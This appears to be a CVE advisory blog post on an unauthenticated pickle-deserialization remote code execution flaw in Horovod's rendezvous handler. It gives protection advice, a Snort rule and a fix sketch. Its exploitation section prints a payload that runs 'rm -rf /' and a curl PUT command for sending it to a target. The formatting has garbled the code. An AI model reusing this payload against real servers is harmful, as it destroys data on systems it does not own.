Horovod, Command Injection, CVE-2025-XXXX (Critical)

By /

How the Mentioned CVE Works:

Horovod versions up to and including v0.28.1 are vulnerable to unauthenticated remote code execution due to improper handling of base64-encoded data in the ElasticRendezvousHandler, a subclass of KVStoreHandler. The vulnerability arises in the `_put_value` method, which calls codec.loads_base64(value). This function decodes the base64-encoded data and passes it to cloudpickle.loads(decoded). Since `cloudpickle.loads` deserializes the data without proper validation, an attacker can craft a malicious pickle object, encode it in base64, and send it via a PUT request. This results in arbitrary code execution on the server, compromising the system.

DailyCVE Form:

Platform: Horovod
Version: <= v0.28.1
Vulnerability: Command Injection
Severity: Critical
Date: Mar 20, 2025

What Undercode Say:

Exploitation:

1. Crafting Malicious Payload:

  • Use Python’s `pickle` module to create a malicious object.
  • Example: 
    import pickle, base64, os
class Exploit:
def <strong>reduce</strong>(self):
return (os.system, ('rm -rf /',))
payload = base64.b64encode(pickle.dumps(Exploit())).decode()
  • Send the payload via a PUT request to the vulnerable Horovod endpoint.

2. Sending Payload:

  • Use `curl` or a Python script to send the malicious payload: 
    curl -X PUT -d "value=<base64_payload>" http://<target>/endpoint

Protection:

1. Update Horovod:

  • Upgrade to a version above v0.28.1 if a patch is available.

2. Input Validation:

  • Implement strict validation for base64-encoded data before deserialization.

3. Restrict Network Access:

  • Limit access to Horovod endpoints to trusted IPs.

4. Use Safe Deserialization:

  • Replace `cloudpickle.loads` with a safer alternative or implement a whitelist for allowed classes.

5. Monitor Logs:

  • Regularly check server logs for unusual PUT requests.

Detection:

  • Use intrusion detection systems (IDS) to monitor for suspicious base64-encoded payloads.
  • Example Snort rule: 
    alert tcp any any -> any 8080 (msg:"Horovod Exploit Attempt"; content:"PUT"; content:"base64"; sid:1000001;)

Code Fix:

  • Modify the `_put_value` method to validate input: 
    def _put_value(self, value):
if not validate_base64(value):
raise ValueError("Invalid base64 data")
decoded = base64.b64decode(value)
safe_deserialize(decoded)

Additional Analytics:

  • CVSS Score: 9.8 (Critical)
  • Affected Systems: Distributed training systems using Horovod.
  • Exploitability: High (Remote, Unauthenticated)
  • Mitigation Difficulty: Medium (Requires code changes and updates).
    By following these steps, you can exploit, detect, and protect against this critical vulnerability in Horovod.

References:

Reported By: https://github.com/advisories/GHSA-mrhh-3ggq-23p2
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top